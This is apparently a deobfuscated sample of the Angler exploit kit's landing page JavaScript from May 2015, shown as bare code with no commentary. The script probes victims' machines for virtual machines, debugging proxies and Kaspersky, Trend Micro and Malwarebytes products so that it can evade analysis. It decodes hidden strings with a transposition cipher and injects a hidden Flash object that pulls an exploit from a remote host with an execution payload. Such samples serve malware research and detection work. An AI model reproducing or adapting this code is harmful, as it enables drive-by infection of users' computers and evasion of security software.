Angler_Landing_2015-05-16

1. window['rXWbJsIp'] = '1';
2. var i_a = [];
3.  
4. function mrkA() {
5.     window['OIIiUFlL'] = true;
6.     window['rXWbJsIp'] = '';
7.     window.fvOWbauMcjLj = false;
8.     window.fvOWbauMcjLs = false;
9.     window.fvOWbauMcjLf1 = false;
10.     window.fvOWbauMcjLf2 = false;
11. }
12.  
13. function mrkV() {
14.     window['RTFYSzh'] = true;
15. }
16.  
17. function Check(rpath, rr) {
18.     var ac = ['RTFYSzh', 'OIIiUFlL', mrkV, mrkA];
19.     if (window[ac[rr]]) return;
20.     var el = document.createElement('script');
21.     if (!window['MSInputMethodContext']) el['language'] = 'some';
22.     el.onload = function() {
23.         ac[rr + 2]();
24.     };
25.     el.src = 'res://' + rpath + '/#16/#1';
26.     el['onreadystatechange'] = function() {
27.         var r = this['readyState'];
28.         if (r == 'complete' || r == 'loaded') {
29.             ac[rr + 2]();
30.         }
31.     };
32.     document.body.appendChild(el);
33. }
34.  
35. function Check_pf(f, r) {
36.     Check("C:\\Program Files\\" + f, r);
37.     Check("C:\\Program Files (x86)\\" + f, r);
38. }
39.  
40. function CheckAll() {
41.     if (navigator.userAgent.indexOf('MSIE') == -1 && navigator.appVersion.indexOf('Trident/') == -1) {
42.         return;
43.     }
44.     var kvx, x0 = 'Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.',
45.         x1 = x0 + '1',
46.         x2 = x0 + '4_5_0.1';
47.     try {
48.         kvx = new ActiveXObject(x1);
49.     } catch (e) {
50.         kvx = false;
51.         try {
52.             kvx = new ActiveXObject(x2);
53.         } catch (e) {
54.             kvx = false;
55.         }
56.     }
57.     if (kvx) {
58.         mrkA();
59.         return;
60.     }
61.     if (document.all && !window.XMLHttpRequest) {
62.         return;
63.     }
64.     var path_sys32 = "\\Windows\\System32\\drivers\\",
65.         kp0 = "Kaspersky Lab\\Kaspersky ",
66.         kp_a = "Anti-Virus ",
67.         kp_i = "Internet Security ",
68.         kp_t = "Total Security ",
69.         kp_p = "PURE",
70.         kp_c = "CRYSTAL ",
71.         kp1 = "\\shellex.dll",
72.         kp2 = "\\mfc42.dll",
73.         kp3 = "\\avzkrnl.dll",
74.         vm_s = ["vm3dmp", "vmusbmouse", "vmmouse", "vmhgfs", "VBoxGuest", "VBoxMouse", "VBoxSF", "VBoxVideo", "prl_time"],
75.         vm_p = ['Fiddler2\\Fiddler.exe', 'VMware\\VMware Tools\\TPAutoConnSvc.exe', 'Oracle\\VirtualBox Guest Additions\\uninst.exe', 'Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe'],
76.         av_s = ["kl1", "tmactmon", "tmcomm", "tmevtmgr", "TMEBC32", "tmeext", "tmnciesc", "tmtdi", "mbam"],
77.         av_p = ["Malwarebytes Anti-Exploit\\mbae.exe", "Malwarebytes Anti-Malware\\mbam.exe", "FiddlerCoreAPI\\FiddlerCore.dll", "Trend Micro\\Titanium\\TmConfig.dll", "Trend Micro\\Titanium\\TmSystemChecking.dll", kp0 + kp_a + '6.0 for Windows Workstations' + kp1, kp0 + kp_a + '6.0' + kp1, kp0 + kp_a + '7.0' + kp1, kp0 + kp_a + '2009' + kp2, kp0 + kp_a + '2010' + kp2, kp0 + kp_a + '2011' + kp3, kp0 + kp_a + '2012\\x86' + kp2, kp0 + kp_a + '2013\\x86' + kp2, kp0 + kp_a + '14.0.0\\x86' + kp2, kp0 + kp_a + '15.0.0\\x86' + kp2, kp0 + kp_a + '15.0.1\\x86' + kp2, kp0 + kp_a + '15.0.2\\x86' + kp2, kp0 + kp_i + '6.0' + kp1, kp0 + kp_i + '7.0' + kp1, kp0 + kp_i + '2009' + kp2, kp0 + kp_i + '2010' + kp2, kp0 + kp_i + '2011' + kp3, kp0 + kp_i + '2012\\x86' + kp2, kp0 + kp_i + '2013\\x86' + kp2, kp0 + kp_i + '14.0.0\\x86' + kp2, kp0 + kp_i + '15.0.0\\x86' + kp2, kp0 + kp_i + '15.0.1\\x86' + kp2, kp0 + kp_i + '15.0.2\\x86' + kp2, kp0 + kp_t + '14.0.0\\x86' + kp2, kp0 + kp_t + '15.0.0\\x86' + kp2, kp0 + kp_t + '15.0.1\\x86' + kp2, kp0 + kp_t + '15.0.2\\x86' + kp2, kp0 + kp_p + kp2, kp0 + kp_p + ' 2.0\\x86' + kp2, kp0 + kp_p + ' 3.0\\x86' + kp2, kp0 + kp_c + '3.0\\x86' + kp2];
78.     for (var i = 0; i < vm_s.length; i++) {
79.         Check(path_sys32 + vm_s[i] + '.sys', 0);
80.     }
81.     for (var i = 0; i < vm_p.length; i++) {
82.         Check_pf(vm_p[i], 0);
83.     }
84.     for (var i = 0; i < av_s.length; i++) {
85.         Check(path_sys32 + av_s[i] + '.sys', 1);
86.     }
87.     for (var i = 0; i < av_p.length; i++) {
88.         Check_pf(av_p[i], 1);
89.     }
90. }
91.  
92. function holdC(millis) {
93.     var date = new Date();
94.     var curDate = null;
95.     do {
96.         curDate = new Date();
97.     } while (curDate - date < millis);
98. }
99. CheckAll();
100. holdC(500);
101. window.fvOWbauMcjLf1 = true;
102. if (!Array.prototype.indexOf) {
103.     Array.prototype.indexOf = function(obj, start) {
104.         for (var i = (start || 0), j = this.length; i < j; i++) {
105.             if (this[i] === obj) {
106.                 return i;
107.             }
108.         }
109.         return -1;
110.     };
111. }
112. var p = 'push',
113.     i = 'indexOf';
114. window["DmjslCQ"] = new Function('text', "var cryptKey = zEwVfv1zEwVfv3, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray." + p + "(rawArray." + i + "(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");
115. var Browser = {
116.     Version: function() {
117.         try {
118.             var birks = /malware.dontneedcoffee.com/.test();
119.         } catch (e) {}
120.         var version = 999;
121.         if (navigator.appVersion.indexOf("MSIE") != -1) version = parseFloat(navigator.appVersion.split("MSIE")[1]);
122.         return version;
123.     }
124. };
125. if (window.fvOWbauMcjLf1) {
126.     var klfg1 = 'wri',
127.         klfg2 = 'te';
128.  
129.     function getKolaio() {
130.         return DmjslCQ(zEwVfk1zEwVfk3);
131.     }
132.  
133.     function getTxl(a) {
134.         return DmjslCQ(zEwVfh1zEwVfh3);
135.     }
136.  
137.     function getData(a) {
138.         return DmjslCQ(zEwVfn1zEwVfn3);
139.     }
140.     var mirtul = "1";
141.     var txt = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf">';
142.     txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
143.     txt = txt + '<param name="play" value="true"/>';
144.     txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" />';
145.     txt = txt + '<!--[if !IE]>-->';
146.     txt = txt + '<object type="application/x-shockwave-flash" data="http://' + getKolaio() + '/' + getTxl(mirtul) + '" allowScriptAccess=always width="1" height="1">';
147.     txt = txt + '<param name="movie" value="http://' + getKolaio() + '/' + getTxl(mirtul) + '" />';
148.     txt = txt + '<param name="play" value="true"/>';
149.     txt = txt + '<param name=FlashVars value="exec=' + getData(mirtul) + '" />';
150.     txt = txt + '<!--<![endif]-->';
151.     txt = txt + '<!--[if !IE]>--></object><!--<![endif]-->';
152.     txt = txt + '</object>';
153.     try {;
154.     } catch (e) {}
155.     document.getElementById("T6Fe3dfg").innerHTML = txt;
156. }